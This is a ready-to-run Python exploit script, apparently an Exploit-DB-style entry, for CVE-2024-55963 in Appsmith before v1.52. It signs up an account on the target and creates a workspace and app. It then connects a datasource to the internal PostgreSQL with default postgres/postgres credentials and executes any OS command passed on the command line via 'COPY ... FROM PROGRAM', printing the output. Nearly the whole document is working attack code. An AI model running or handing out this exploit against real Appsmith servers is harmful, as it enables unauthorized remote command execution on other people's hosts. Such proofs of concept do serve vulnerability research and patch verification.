# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE)
# Original Author: Rhino Security Labs
# Exploit Author: Nishanth Anand
# Exploit Date: April 2, 2025
# Vendor Homepage: https://www.appsmith.com/
# Software Link: https://github.com/appsmithorg/appsmith
# Version: Prior to v1.52
# Tested Versions: v1.47
# CVE ID: CVE-2024-55963
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Appsmith versions prior
#   to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM
#   PROGRAM command execution.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, Database
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: The vulnerability exists in Appsmith's internal PostgreSQL database
#   configuration, allowing attackers to execute arbitrary commands on the
#   host system.

import argparse
import json

import pyfiglet
import requests

# Banner
print(pyfiglet.figlet_format("Appsmith RCE"))

# ---------------------------------------------------------------------------
# CLI: -u/--url is the target base URL; the optional positional argument is
# the OS command to execute on the host (defaults to `id`).
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept')
parser.add_argument('-u', '--url', required=True, help='Base URL of the target')
parser.add_argument('command', nargs='?', default='id', help='Command to execute')
args = parser.parse_args()

base_url = args.url
command_arg = args.command
if not base_url.startswith(("http://", "https://")):
    base_url = "http://" + base_url

USER_AGENT = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) "
              "Gecko/20100101 Firefox/132.0")


def api_headers(cookie_name, cookie_value, *, json_body=False):
    """Headers for an authenticated Appsmith API call.

    Carries the session cookie captured at login.  When json_body is True,
    also adds the fields Appsmith requires on JSON POSTs (Content-Type plus
    the CSRF-style X-Requested-By header, without which the API rejects the
    request).  Content-Length is never set by hand: requests computes it.
    """
    headers = {
        "User-Agent": USER_AGENT,
        "Accept": "application/json, text/plain, */*",
        "Connection": "keep-alive",
        "Cookie": f"{cookie_name}={cookie_value}",
    }
    if json_body:
        headers["Content-Type"] = "application/json"
        headers["X-Requested-By"] = "Appsmith"
        headers["Origin"] = base_url
    return headers


# ---------------------------------------------------------------------------
# Step 1: sign up a throwaway account (signup endpoint is unauthenticated).
# ---------------------------------------------------------------------------
print('Signing up...')
signup_response = requests.post(
    f"{base_url}/api/v1/users",
    data={"email": "poc1@poc.com", "password": "Testing123!"},
)
signup_response.raise_for_status()

# ---------------------------------------------------------------------------
# Step 2: log in and capture the session cookie from the Set-Cookie header.
# ---------------------------------------------------------------------------
print('Logging in...')
login_response = requests.post(
    f"{base_url}/api/v1/login",
    headers={
        "User-Agent": USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/user/login",
    },
    data={"username": "poc1@poc.com", "password": "Testing123!"},
    allow_redirects=False,  # the SESSION cookie is set on the 302 response
)
login_response.raise_for_status()

set_cookie = login_response.headers.get('Set-Cookie')
if not set_cookie:
    # Previously this fell through and crashed later with NameError on
    # cookie_name; fail loudly instead.
    raise SystemExit('Login did not return a Set-Cookie header; aborting.')
# "SESSION=<value>; Path=/; ..." -> name, value.  maxsplit=1 guards against
# '=' characters inside the cookie value.
cookie_name, cookie_value = set_cookie.split(';')[0].split('=', 1)

# ---------------------------------------------------------------------------
# Step 3: create a workspace to work inside.
# ---------------------------------------------------------------------------
print('Creating a new workspace...')
workspace_response = requests.post(
    f"{base_url}/api/v1/workspaces",
    headers=api_headers(cookie_name, cookie_value, json_body=True),
    data=json.dumps({"name": "Untitled workspace 3"}),
)
workspace_response.raise_for_status()
try:
    workspace_id = workspace_response.json().get("data", {}).get("id")
except ValueError:
    raise SystemExit(
        f"Workspace response is not valid JSON: {workspace_response.text}")
if not workspace_id:
    raise SystemExit(
        f"Could not extract workspace id from: {workspace_response.text}")

# ---------------------------------------------------------------------------
# Step 4: create an application inside the workspace (required so the
# workspace is fully initialised before we enumerate its plugins).
# ---------------------------------------------------------------------------
print('Creating a new application...')
application_response = requests.post(
    f"{base_url}/api/v1/applications",
    headers=api_headers(cookie_name, cookie_value, json_body=True),
    json={
        "workspaceId": workspace_id,
        "name": "Untitled application 2",
        "color": "#E3DEFF",
        "icon": "chinese-remnibi",
        "positioningType": "FIXED",
        "showNavbar": None,
    },
)
application_response.raise_for_status()

# ---------------------------------------------------------------------------
# Step 5: list the workspace plugins and locate the PostgreSQL plugin by
# fetching each plugin's form definition and looking for "postgres" in it.
# ---------------------------------------------------------------------------
print('Getting workspace details...')
details_response = requests.get(
    f"{base_url}/api/v1/workspaces/{workspace_id}",
    headers=api_headers(cookie_name, cookie_value),
)
details_response.raise_for_status()
try:
    plugins = details_response.json().get("data", {}).get("plugins", [])
except ValueError:
    raise SystemExit(
        f"Workspace details are not valid JSON: {details_response.text}")

print('Searching for vulnerable postgres database...')
postgres_plugin_id = None
for candidate_id in (plugin.get("pluginId") for plugin in plugins):
    try:
        form_response = requests.get(
            f"{base_url}/api/v1/plugins/{candidate_id}/form",
            headers=api_headers(cookie_name, cookie_value),
        )
        form_response.raise_for_status()
        form_items = form_response.json().get('data', {}).get('form', [])
    except requests.exceptions.HTTPError as e:
        print(f"Error checking plugin {candidate_id}: {e}")
        continue
    except ValueError:
        continue  # non-JSON form response; try the next plugin
    if any("postgres" in str(item) for item in form_items):
        print("Vulnerable postgres database found.")
        postgres_plugin_id = candidate_id
        break

if postgres_plugin_id is None:
    # Previously an empty plugin list crashed with NameError on an undefined
    # response variable; exit cleanly instead.
    raise SystemExit('No postgres plugin found; target does not appear exploitable.')

# ---------------------------------------------------------------------------
# Step 6: resolve the environment id for the workspace.  On instances without
# the environments API this falls back to the workspace id itself.
# ---------------------------------------------------------------------------
workspace_id_value = workspace_id
print('Getting the workspace details...')
try:
    env_response = requests.get(
        f"{base_url}/api/v1/environments/workspaces/{workspace_id}"
        "?fetchDatasourceMeta=true",
        headers=api_headers(cookie_name, cookie_value),
    )
    env_response.raise_for_status()
    try:
        env_id = env_response.json().get("data", [{}])[0].get("id")
        if env_id:
            workspace_id_value = env_id
    except (ValueError, IndexError):
        print("Response content is not valid JSON or does not contain the "
              "expected structure:", env_response.text)
except requests.exceptions.HTTPError as e:
    print(f"Could not fetch environment details: {e}")
    print("Using existing workspace ID for datasource creation...")

# ---------------------------------------------------------------------------
# Step 7: create a datasource pointing at Appsmith's own internal postgres
# (localhost:5432, default postgres/postgres credentials — the misconfiguration
# at the heart of CVE-2024-55963).
# ---------------------------------------------------------------------------
print('Connecting to vulnerable postgres database...')
datasource_response = requests.post(
    f"{base_url}/api/v1/datasources",
    headers=api_headers(cookie_name, cookie_value, json_body=True),
    json={
        "pluginId": postgres_plugin_id,
        "datasourceStorages": {
            workspace_id_value: {
                "datasourceConfiguration": {
                    "properties": [
                        None,
                        {"key": "Connection method", "value": "STANDARD"},
                    ],
                    "connection": {
                        "mode": "READ_WRITE",
                        "ssl": {"authType": "DEFAULT"},
                    },
                    "endpoints": [{"port": "5432", "host": "localhost"}],
                    "sshProxy": {"endpoints": [{"port": "22"}]},
                    "authentication": {
                        "databaseName": "postgres",
                        "username": "postgres",
                        "password": "postgres",
                    },
                },
                "datasourceId": "",
                "environmentId": workspace_id_value,
                "isConfigured": True,
            }
        },
        "name": "Untitled datasource 1",
        "workspaceId": workspace_id,
    },
)
datasource_response.raise_for_status()
try:
    datasource_id = datasource_response.json().get("data", {}).get("id")
except ValueError:
    raise SystemExit(
        f"Datasource response is not valid JSON: {datasource_response.text}")
if not datasource_id:
    raise SystemExit(
        f"Could not extract datasource id from: {datasource_response.text}")


def run_sql(sql_body):
    """POST *sql_body* to the datasource's schema-preview endpoint.

    schema-preview executes arbitrary SQL against the configured datasource;
    returns the raw requests.Response for the caller to inspect.
    """
    return requests.post(
        f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview",
        headers=api_headers(cookie_name, cookie_value, json_body=True),
        json={"title": "SELECT", "body": sql_body, "suggested": True},
    )


# ---------------------------------------------------------------------------
# Step 8: run the command.  COPY ... FROM PROGRAM makes the postgres server
# execute the command and load its stdout into the table, giving code
# execution as the database OS user.  Output is then read back with SELECT.
# ---------------------------------------------------------------------------
print("Creating the table 'poc'...")
run_sql("create table poc (column1 TEXT);").raise_for_status()

print("Running command...")
run_sql(f"copy poc from program '{command_arg}';").raise_for_status()

print("Reading command output from poc table...\n")
output_response = run_sql("select * from poc;")
try:
    rows = output_response.json().get("data", {}).get("body", [])
    print("Command output:")
    print("----------------------------------------")
    for row in rows:
        print(row.get("column1"))
    print("----------------------------------------\n")
except (ValueError, KeyError):
    print("Response content is not valid JSON or does not contain the "
          "expected structure:", output_response.text)

# Cleanup: drop the scratch table (best-effort, matching the original which
# did not check this response's status).
print('\nDropping the table...')
run_sql("DROP TABLE poc;")